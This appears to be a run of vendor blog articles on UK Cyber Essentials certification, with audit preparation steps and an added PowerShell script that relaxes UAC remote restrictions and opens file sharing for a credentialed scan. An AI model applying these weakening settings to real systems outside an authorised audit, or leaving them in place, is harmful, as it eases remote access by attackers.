These tools can also help identify unusual patterns, such as multiple failed login attempts that may indicate a security breach. By monitoring these activities, you can prevent minor issues from escalating into major security incidents. 

4. Secure access solutions

Beyond passwords, implementing secure access solutions is crucial. Use secure channels such as VPNs to encrypt data and prevent hackers from intercepting it.

Executing a Cyber Essentials password policy

Securing your business’s digital infrastructure is more important than ever as attacks become more frequent. A well-crafted password policy that complies with Cyber Essentials helps protect your business from cybercriminals.

To learn more about Cyber Essentials and how it can benefit your business, check out our guide to UK certifications.


Cyber Essentials vs. Cyber Essentials Plus: which is best for your business


If you've been considering a cybersecurity certification for your business, you've probably been weighing up Cyber Essentials vs Cyber Essentials Plus.

By choosing the right certification, you ensure that your cybersecurity measures align with your business’s specific needs and help you stay ahead of potential risks. Whether you need basic protection or a more thorough assessment, this guide will help you decide which certification is the best fit for you.

What are Cyber Essentials and Cyber Essentials Plus?

Cyber Essentials is a government-backed certification scheme designed to help businesses protect themselves from the most common cyber threats. This framework equips businesses with the essential steps needed to strengthen their defences and minimise security risks.

Cyber Essentials Plus follows the same fundamental framework and the same controls, but adds an independent, hands-on technical audit, offering a higher level of assurance that the controls are actually in place.

How are they similar?

Both Cyber Essentials and Cyber Essentials Plus follow the same five security controls:

  • Boundary firewalls and internet gateways: ensuring a secure internet connection
  • Secure configuration: guaranteeing devices are set up securely
  • User access control: restricting access to data and services
  • Malware protection: implementing defensive measures against viruses 
  • Patch management: keeping software and devices up to date

These controls are the backbone of the Cyber Essentials scheme, helping organisations mitigate risks and protect against common cyber threats.

How are they different?

The key distinction between Cyber Essentials and Cyber Essentials Plus lies in the assessment process.

Cyber Essentials

This certification ends with a self-assessment. You complete a questionnaire to confirm you’ve implemented the necessary security controls in your business. A certification body then reviews the assessment and decides whether you've met the qualification requirements.

Cyber Essentials Plus

Cyber Essentials Plus includes an independent audit. An auditor will thoroughly evaluate your security controls, ensuring you've implemented them correctly.

Advantages of Cyber Essentials and Cyber Essentials Plus

Cyber Essentials

Cyber Essentials is a cost-effective way to simplify and demonstrate your commitment to cybersecurity, and it is essential for companies bidding for government contracts. Not only does it provide a solid foundation for further security measures, it also gives businesses a competitive edge by building trust with customers and partners. 

Cyber Essentials Plus

The Plus certification offers enhanced credibility through third-party verification, increasing trust with customers and partners. This is especially valuable for those in industries with strict data security regulations, such as healthcare or the financial sector. It also helps you to stand out when securing contracts and increases protection against advanced threats. 

Cyber Essentials vs. Cyber Essentials Plus: the verdict

It might sound like a bit of a non-conclusion, but choosing between Cyber Essentials and Cyber Essentials Plus depends on your business's needs.

Cyber Essentials is a great starting point for businesses looking to demonstrate basic cybersecurity measures. However, if your industry demands higher assurance levels or if you handle sensitive data, Cyber Essentials Plus offers added credibility and support through independent verification.

Is Cyber Essentials certification worth the investment?

If you’re considering Cyber Essentials certification, you’ve probably got some questions about the process. Most importantly, what does it cost and is Cyber Essentials certification worth the investment? If so, we’ve got you covered. Read on for everything you need to know. 

How much does Cyber Essentials cost?

From 2014 to 2022, you paid a flat fee of £300 plus VAT to get a Cyber Essentials certification. However, in 2022, the National Cyber Security Centre (NCSC) adopted a tiered pricing structure. 

Under the new tiered system, Cyber Essentials costs range from £300 to £600 plus VAT. Tiers are decided by factors such as business size, number of locations, and the current level of cybersecurity measures in place.

This fee covers the assessment and certification process. However, the total cost can vary due to factors like the support required to meet the five assessment controls:

  • Firewalls
  • Secure configuration
  • User access control
  • Malware protection
  • Patch management

Costs can also differ from certification body to certification body, with some charging for extra support, resubmissions and additional services. 

Ready to get started with Cyber Essentials Certification? CyberSmart offers the fastest and simplest route to certification on the market.

Why have Cyber Essentials costs changed?

With the rise of cloud services, remote work, and digital transformation, businesses face new challenges in securing their data and systems.

To address these changes, the NCSC and IASME Consortium updated the Cyber Essentials requirements, which now include:

  • Cloud services: ensuring secure configuration of cloud platforms
  • Multi-factor authentication (MFA): adding an extra layer of security for user logins
  • Password management: implementing stronger password policies
  • Security updates: regular software updates to protect against vulnerabilities
  • Remote working: securing remote access to company systems and data

These updates have led to more rigorous assessments, particularly for larger companies, and you’ll see this reflected in the new pricing.

The benefits of Cyber Essentials certification

Now for the most important question, is Cyber Essentials certification worth the investment? 

In short, yes. Cyber Essentials certification offers benefits to every organisation. Let’s take a look at some of the key reasons to invest in certification.

You’ll be more secure 

Cyber Essentials helps you put a strong security foundation in place. When its security controls are properly implemented, your organisation will be far better prepared to identify, prevent and respond to attacks. In fact, Cyber Essentials can reduce your cyber risk by up to 98.5%.

Reduced risk 

Cyber Essentials focuses on critical elements of your security like regularly patching applications and implementing multi-factor authentication (MFA). These and other controls dramatically reduce the risk of a breach.

Cost-effectiveness 

Although getting Cyber Essentials certified requires some investment, the upfront cost is negligible compared to the cost of a breach. The Department for Science, Innovation and Technology (DSIT) estimates that the single most disruptive breach from the last 12 months cost businesses £1,205 on average.

It’s also worth noting that while that figure looks low, it’s for a single breach. Many organisations suffer multiple breaches per year, so the real cost is likely to be higher. Adopting robust security controls can help prevent a breach in the first place, saving your organisation money in the long run.

Assure customers and partners 

Gone are the days when cybersecurity and data protection were secondary concerns for customers. Research shows that 60% of men and women are more concerned about their personal data than a year ago. And this influences decision-making in the workplace. 

As a result, businesses are increasingly reluctant to work with organisations that can’t demonstrate a commitment to security. 

Completing Cyber Essentials allows you to demonstrate that you take cybersecurity and data protection seriously. You'll even get a digital badge to display on your website, helping you show your credentials and win business. 

Better response to incidents 

Every business hopes to avoid being breached. However, cybercriminals are resourceful and excellent at finding unknown vulnerabilities. Cyber Essentials can help you put in place the processes you need to recover quickly, even if the worst-case scenario does happen.

Ability to bid for government contracts 

Cyber Essentials is likely to be mandated if your organisation is a government body, but you may not know that it also applies to government suppliers. Getting Cyber Essentials certified can give you the ability to bid for lucrative government contracts, opening up an additional revenue stream. Or, if you're already a government supplier, it can help you keep that contract. 

Meet your compliance requirements 

While this doesn’t apply to every industry, there are many sectors where Cyber Essentials certification is mandatory or at the very least, strongly recommended for compliance. These include sectors like education, healthcare, financial services and law. 

What should you look for in a Cyber Essentials certification body? 

We’ve established why Cyber Essentials is worth the investment. However, not all certification providers are created equal. So, what should you look for when picking a certification body?

Unlimited support 

Cyber Essentials certification is usually a fairly straightforward process. Nevertheless, if it's your first time or you have more complex needs (such as multiple offices or hybrid working), you'll need support. Look for providers who offer unlimited support and provide ready access to auditors. 

Free resubmissions 

It's not always possible to complete the certification process first time. In many cases, you'll need to remediate aspects of your IT estate. When this happens, some providers will charge you for resubmissions, so keep an eye out for those who don't. 

In-assessment guidance and automation

Some certification bodies use assessment platforms that guide you as you go or automate parts of the process. Although this can (but does not always) mean a greater up-front cost, it's well worth it for the time it'll save you.

Ongoing protection

Cyber Essentials is a great first step, but year-round protection goes further than certification day. Look for providers that will help your business stay protected year-round through vulnerability scanning, threat detection and cyber insurance. 

Want to know more about cybersecurity certifications? Check out our guide to UK certifications for everything you need to know.

What to expect from Cyber Essentials audits

If you’re looking to strengthen your cybersecurity and data protection processes, a Cyber Essentials or Cyber Essentials Plus certification could be right for you.

Cyber Essentials is a framework that provides guidance to help businesses protect themselves against cyber threats. The final step in the process is a self-assessment to ensure you’ve implemented the necessary tools and measures to protect your business. 

Cyber Essentials Plus adheres to the same security controls, but it offers hands-on technical verification and an independent, third-party audit for added peace of mind.

Why consider Cyber Essentials or Cyber Essentials Plus accreditation?

You might decide to go for Cyber Essentials or Cyber Essentials Plus accreditation because of:

  • Client assurance: demonstrate to clients that data protection is a top priority
  • Industry standards: you work in an industry with higher-than-standard cybersecurity requirements
  • Bid for government contracts: having Cyber Essentials is mandatory when bidding for government contracts and creates a clear distinction from other businesses
  • Improved security processes: a framework to improve your internal processes, saving time, money, and stress when implementing your cybersecurity

What’s the difference between Cyber Essentials and Cyber Essentials Plus?

Cyber Essentials is an independently verified self-assessment certification that ensures an organisation adheres to the most robust cybersecurity controls.

Cyber Essentials Plus requires the exact same technical expectations as Cyber Essentials but also includes an independent technical audit of your IT systems. It adds an extra level of assurance, but the pass bar is slightly higher than Cyber Essentials' self-assessment.

To achieve Cyber Essentials Plus, you first need to be Cyber Essentials certified. Here's a breakdown of the steps involved:

Cyber Essentials 

Cyber Essentials has five security controls you must meet to achieve certification. 

  • Firewalls
  • Secure configuration
  • User access control
  • Malware protection
  • Security update management

Obtaining the Cyber Essentials certification includes completing a self-assessment questionnaire, which the certification body reviews. Business owners must approve the self-assessment answers before sending them. 

Is there a Cyber Essentials audit?

There is no Cyber Essentials audit. The self-assessment will provide a range of questions that relate to the five control areas of Cyber Essentials, and the certification will expire after 12 months.

Cyber Essentials Plus 

Cyber Essentials Plus includes an additional technical audit of your IT systems to verify you have the right controls in place. An external auditor assesses your devices, systems, and processes for additional validation and added protection. 

Want to protect your business from 98.5% of cyber threats? Get Cyber Essentials certified today.

Benefits of a Cyber Essentials Plus audit

  • Credibility: an independent audit is more credible than a self-assessment
  • Independent assessment: provides an additional layer of validation beyond the self-assessment required for Cyber Essentials
  • Compliance assurance: an objective, professional opinion ensures compliance, providing peace of mind
  • Client trust: provides external proof that you take cybersecurity and data management seriously, enhancing trust with clients

What to expect from the Cyber Essentials Plus auditor

During the Cyber Essentials Plus audit, the auditor will:

  • Confirm which devices need auditing
  • Scan devices to identify vulnerabilities using Nessus Professional scanning software
  • Observe email processing with test attachments
  • Check downloads of file attachments from test websites
  • Verify that you've installed and configured your antivirus software correctly
  • Test multi-factor authentication (MFA) on applicable cloud services
  • Assess how well default browsers block malicious activity
  • Confirm account separation between admin and user accounts
  • Capture screenshots for evidence

Prepare for your Cyber Essentials Plus audit:

Information to give the auditor

  • Administrator-level domain access or create a new admin account
  • A list of all in-scope devices and operating systems
  • User email addresses for email/web tests
  • A signed consent form

Check and update software:

  • Ensure all devices, including servers, are up to date
  • Download and install the 7-day trial of Nessus Professional for a credentialed patch scan or use an alternative PCI-approved scanning tool
  • Remove unused software from all devices

If you run Windows:

  • Enable file and print sharing. You can find this option in advanced sharing settings

If you run Windows 10:

  • Set the Windows service “RemoteRegistry” start-up type to “manual.” Access this by typing “services” in the home screen search bar
  • Create a new registry value:
      • Type “regedit” in the home screen search bar
      • Hive and key path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
      • On System, right-click and select New –> DWORD (32-bit) Value / REG_DWORD
      • Value name: LocalAccountTokenFilterPolicy
      • Value data: 1 (decimal)

If you run macOS:

  • Enable file sharing and remote login. You’ll find these options in System Preferences –> Sharing
  • Update AV engines and signature files. If you use an enterprise management dashboard to do this, even better
  • Activate and update AV plugins for every browser
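The Windows preparation steps above, scripted as an added example that is not part of this article or of any certification body's tooling. The `-Revert` switch is this example's own addition for after the audit, and it assumes the Windows 10 client default of a disabled RemoteRegistry service; adjust that to your own baseline. Run it from an elevated PowerShell prompt.

```powershell
# Added example: prepare a Windows 10 device for the Cyber Essentials Plus
# credentialed scan, and undo the change afterwards with -Revert.
[CmdletBinding()]
param(
    # -Revert is this example's own switch; it is not an audit requirement.
    [switch]$Revert
)

$svc  = 'RemoteRegistry'
$key  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$name = 'LocalAccountTokenFilterPolicy'

if (-not $Revert) {
    # 1. RemoteRegistry start-up type -> Manual, so the scanner can start it on demand.
    Set-Service -Name $svc -StartupType Manual

    # 2. The REG_DWORD described in the article, value data 1 (decimal).
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    New-ItemProperty -Path $key -Name $name -PropertyType DWord -Value 1 -Force | Out-Null

    # 3. Enable file and print sharing (the firewall rule group behind the
    #    "advanced sharing settings" option).
    Enable-NetFirewallRule -DisplayGroup 'File and Printer Sharing'
}
else {
    # Value data 1 relaxes UAC remote restrictions for local accounts, so
    # remove it once the auditor has finished, and close the sharing rules.
    Remove-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue
    Disable-NetFirewallRule -DisplayGroup 'File and Printer Sharing'
    # Assumption: Disabled is the Windows 10 client default for this service.
    Set-Service -Name $svc -StartupType Disabled
}

# Show the resulting state so it can be captured as audit evidence.
Get-Service -Name $svc | Select-Object Name, StartType, Status
Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue |
    Select-Object -Property $name
```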

Need more support?

If you’re not ready for a Cyber Essentials self-assessment or Cyber Essentials Plus audit, don’t rush into it. Make sure you’re prepared and consider your industry, goals, size, and the benefits of gaining a certification. 

Proving your cybersecurity credentials is important, and you can take it slow by starting with Cyber Essentials before graduating to Cyber Essentials Plus. By following these steps, you’ll be well-prepared for your Cyber Essentials self-assessment or Cyber Essentials Plus audit. 

For more guidance, download our comprehensive guide to cybersecurity certifications in the UK.

What is Cyber Essentials? Mastering the five controls of SME cybersecurity

You might have heard that it’s something your business needs, but what is Cyber Essentials? 

Cyber Essentials is a government-backed scheme designed to help SMEs protect themselves and stay productive in a world of increasing cyber threats. And with 50% of UK businesses becoming victims of cybercrime in 2024 so far, many consider it a requirement rather than a consideration.

Why is Cyber Essentials important?

The sad truth is that every business, no matter how small, could become a target of a cyber-attack. And growing supply chains and reliance on technology services can add to your vulnerability.

Cyber Essentials is a low-effort way for any SME to go from 0% to 98.5% protection against the most common cyber threats. In as little as 24 hours, you can receive Cyber Essentials certification. 

For some businesses, Cyber Essentials is mandatory. If you want to secure government or MOD contracts, it’s essential. 

PwC revealed that 85% of consumers “wish there were more companies they could trust with their data.” And in the B2B space, revenue in the Cybersecurity market is projected to reach US$185.70bn in 2024. So, you can bet that they’ll look hard at their potential vendors and suppliers, too.

And while Cyber Essentials isn’t a panacea for all cyber threats, it provides a valuable set of controls that deliver cost-effective cybersecurity for any business. With this foundation and protection from over 98% of common cyber threats, you can grow your business with confidence.

What's preventing businesses from getting Cyber Essentials?

Only 31% of UK businesses undertook a cyber risk assessment in 2024. Those who haven’t often believe that:

  • It won't happen to them. Many businesses feel as though they fall under the radar and that data breaches are out of the question
  • Their business is too small. Some SMEs feel their business is too small and don't need to assess risk because their processes don't need improving
  • They don’t have enough budget. SMEs who don't understand the value of Cyber Essentials often feel the cost of a cybersecurity certification outweighs the benefits.

Sadly, any business can fall victim to a cyber-attack, so you can't put a price on cybersecurity. Cyber-attacks cost UK businesses £10,830, on average.

Who runs Cyber Essentials?

Cyber Essentials is the brainchild of the National Cyber Security Centre (NCSC). Founded in 2016, the NCSC combines expertise from CESG (the information assurance arm of GCHQ), the Centre for Cyber Assessment, CERT-UK, and the Centre for Protection of National Infrastructure. 

Want to protect your business from 98.5% of cyber threats? Get Cyber Essentials certified today.

What areas does Cyber Essentials cover?

Cyber Essentials covers five key areas of cybersecurity across your IT infrastructure, including common outliers, like thin clients, BYOD, and home working devices. The NCSC updates the certification regularly, as modern technology becomes commonplace, to keep pace with today’s working world.

  1. Firewalls. The boundary defences of your networks
  2. Secure configuration. Security measures for building or installing devices
  3. User access control. Managing user access and admin rights
  4. Malware protection. Protection from malicious software
  5. Patch management. Making sure all systems are updated correctly

How it works

Cyber Essentials is straightforward. All you have to do is complete a self-assessment questionnaire and submit it via an online portal. The assessment questionnaire is around 30 pages and is broken up into eight sections. It includes questions like:

A4.7. Have you configured your boundary firewalls so that they block all other services from being advertised on the internet? By default, most firewalls block all services from inside the network from being accessed from the internet, but you need to check your firewall settings.

On average, we’ve found that it takes small businesses around two weeks to complete an assessment. When you submit your assessment, the certification body reviews and grades your application. They have a ‘pass/fail’ system, so once you’ve passed, you’re good to go.

The five Cyber Essentials controls

Firewalls

Firewalls are your boundary defences. They prevent unrestricted access to and from private networks. Set up correctly, boundary firewalls and internet gateways allow you to take control of your system and who can access it. And it's easy to adjust your firewall as required. 

Secure configuration

Secure configuration involves configuring computer systems, networks, or software applications to minimise potential security risks – essential when managing your servers. Configuring computers and network devices is necessary to keep vulnerabilities at bay, and will help to prevent unauthorised activity. With this in place, you can rest assured that each device will only provide the minimum data and information when building or installing.

User access control

Get complete oversight when managing user access and admin rights. It’s easy to give multiple users administrator access for convenience, but it’s crucial to restrict it to prevent hackers from obtaining your information and data.

Malware protection

Protect your business from malicious software with antivirus support. Malware can wreak havoc by corrupting crucial files and stealing confidential data. Not only that, but the software could potentially block access and demand a ransom. 

Securing your business against a wide variety of malware is essential to protect your privacy, devices, and reputation.

Patch management

Update your software as soon as new patches become available. Patch management is critical to prevent hackers from exploiting known weaknesses and updating software and operating systems can fix vulnerabilities before they become a serious issue.

Want to know more about the different types of cybersecurity certifications available to UK businesses? Then check out our comprehensive guide to Cyber Essentials and beyond.

Cyber Essentials vs ISO 27001 – key differences and benefits

Practising good cyber hygiene is essential for SMEs. To reduce risk, the UK government has developed guidelines on how to defend against threats.  

But it’s not always easy to know which standard is best for your business. Which should you get and why? To help you decide, let’s look at Cyber Essentials vs ISO 27001.

What is Cyber Essentials?

Cyber Essentials (CE) is a government-backed scheme proven to protect against common cyberattacks. It’s the minimum certification required for any government supplier responsible for handling personal information in the UK.

For SMEs, a CE certification demonstrates you’re serious about security – both to customers and regulators. 

Your security is evaluated across five categories. You must:

1. Configure and deploy a firewall

Your firewall needs to protect all devices – especially those connected to a public or untrustworthy network.

2. Use secure configurations for devices and software

Most devices and software have default settings aimed at making the device as open and available as possible. These can leave you open to attack. 

CE requires you to reconfigure your settings to maximise security. This includes using strong (not default) passwords and introducing extra layers of security such as two-factor authentication.

3. Make use of access control to prevent unauthorised access to data and services

Your employees should have the minimum access needed to perform their role. You’ll need to set up and define access levels for standard and administrative accounts to minimise risk. 

4. Protect yourself against malware such as viruses

Malware, short for malicious software, is any computer program that causes harm to a device or its user. 

You must implement one of the following to meet these requirements:

  • Anti-malware solutions such as Windows Defender or Mac OS XProtect
  • A sandbox environment with restricted access to the rest of your files and network
  • A software whitelist to prevent users from running anything potentially harmful

5. Keep devices and software updated

Device manufacturers and software developers release updates (also known as patches). These are key to fixing known vulnerabilities in the software and must be installed when they become available.

Want to know more about the certifications available to you? Check out our guide to UK cybersecurity certifications.

What is ISO 27001?

ISO 27001 is an international standard for information security. It defines what’s required for establishing, implementing, maintaining, and improving an information security system. It’s much more comprehensive than Cyber Essentials. 

Rather than having specific guidelines to follow, ISO 27001 has 14 controls that support compliance. 

1. Develop an information security policy

This provides direction to support your people. It should clearly lay out how to manage information in accordance with laws and business requirements. You should regularly review it to check it’s effective.

2. Implement and manage information security within your organisation

You need to provide a mechanism for managing information security, including coordinating responsibilities with employees and maintaining contact with authorities, third parties, and security providers.

ISO 27001 provides the framework for managing information security in different aspects of your organisation, for example teleworking or project management.

3. Provide training and awareness to HR

Ensure employees are aware of their responsibilities and given suitable training to fulfil them. You also need to make sure any changes in employment conditions don't affect security standards. 

4. Ensure organisational assets are secure

You should be able to identify and classify information security assets based on the sensitivity of the information they handle. You’ll also need to assign staff responsibilities for keeping devices secure. 

5. Make use of access control to protect information

Employees and third parties should have restricted access to your information. You’ll need formal processes to grant and revoke user rights. 

6. Protect the confidentiality and integrity of information 

Use encryption to protect the confidentiality and integrity of your data. This can help keep you safe by making the data unusable for hackers – even if they do manage to access your network.

7. Prevent unauthorised physical access to your workplace

Protect physical assets from unauthorised access and natural disasters. If these areas are breached, for example by forced entry or extreme weather, it could cause operational issues and expose sensitive data. 

8. Deploy secure configurations for operational infrastructure

You must securely configure devices, software, and operating systems. This might include:

  • Using antivirus software
  • Changing default settings to security-first ones
  • Gathering and recording evidence of security vulnerabilities 

9. Secure configurations for network infrastructure

All routers, switches, services, and software that make up your network must be configured to standards you set in a network services agreement. The agreement should identify security features and management requirements for the network, including: 

  • How to monitor and control network traffic
  • How to securely use applications and systems, e.g. by using a firewall

10. Prioritise security when acquiring, developing, and maintaining information systems

Consider security at every level of your information system. From the moment you set up a new system, you must have security controls to prevent the loss or misuse of information.

11. Ensure information security for activities by suppliers

Monitor all outsourced activities to confirm that your suppliers comply with the same security requirements you’ve laid out for your own organisation. 

12. Develop an effective approach for managing information security incidents

If an accident occurs or your systems are breached, you need to:

  • Communicate the details of the security incident and event quickly
  • Gather and preserve evidence for further analysis
  • Develop your information security process to prevent a repeat incident

13. Prevent information security failures from interrupting business continuity 

ISO 27001 provides a step-by-step process to continue operations after a breach. A key aspect of this is making sure staff can access information systems. 

14. Ensure compliance with information security policies and standards

Get guidance on how to adhere to standards and abide by the law so you stay compliant.

Cyber Essentials vs ISO 27001 – what are the main differences?

There are five basic differences when comparing the two security standards. 

  1. Flexibility – Cyber Essentials is prescriptive. You’ll get detailed guidance on what to do and how to do it. ISO 27001 requirements, on the other hand, are broader and leave more to your discretion
  2. Time –  It can take as little as a day to get CE accredited whereas ISO 27001 takes 6-9 months
  3. Audits – There’s no audit in the Cyber Essentials assessment, but for ISO 27001 you’ll have yearly maintenance audits and a recertification audit every 3 years
  4. Location – Cyber Essentials is only recognised in the UK, whereas ISO 27001 is international
  5. Level of difficulty – Cyber Essentials is very much an entry-level qualification that gives you a good foundation of knowledge. ISO 27001 is advanced in subject matter and assessment criteria

Cyber Essentials vs ISO 27001 – the benefits

Cyber Essentials is a great entry-level qualification with simple instructions and a fast certification process. It's perfect for businesses that want to show a commitment to cyber hygiene and bid for government contracts.

ISO 27001 is an internationally recognised accreditation that showcases robust security practices, which may give you a competitive edge. 

Choosing your accreditation

The best certification for your business depends on your requirements, size, and infrastructure. Now that you know the key talking points in the Cyber Essentials vs ISO 27001 debate, hopefully you’ll be able to make a more informed decision.
